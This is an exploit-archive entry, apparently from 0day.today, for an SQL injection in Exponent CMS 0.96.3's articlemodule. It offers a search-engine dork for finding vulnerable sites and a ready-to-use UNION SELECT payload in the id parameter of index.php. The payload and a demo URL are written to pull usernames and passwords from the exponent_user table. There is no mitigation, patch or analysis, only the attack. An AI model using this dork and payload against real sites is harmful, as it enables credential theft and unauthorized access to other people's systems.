id: 10783
date: 02/07/2010
title: Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability
author: T u R c O
cves: 

===============================================================
Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability
===============================================================

# Script : exponentcms
# Dork: "Welcome to Exponent CMS" | "my new exponent site"  inurl:articlemodule
               
   
####################################################################
   
===[ Exploit ]===
   
http://server/index.php?action=view_article&module=articlemodule&id= SQL INJECTION
   
  -1+union+select+1,2,3,password,username,6+from+exponent_user--
 
Demo:
 
http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--
 


#  0day.today [2023-03-21]  #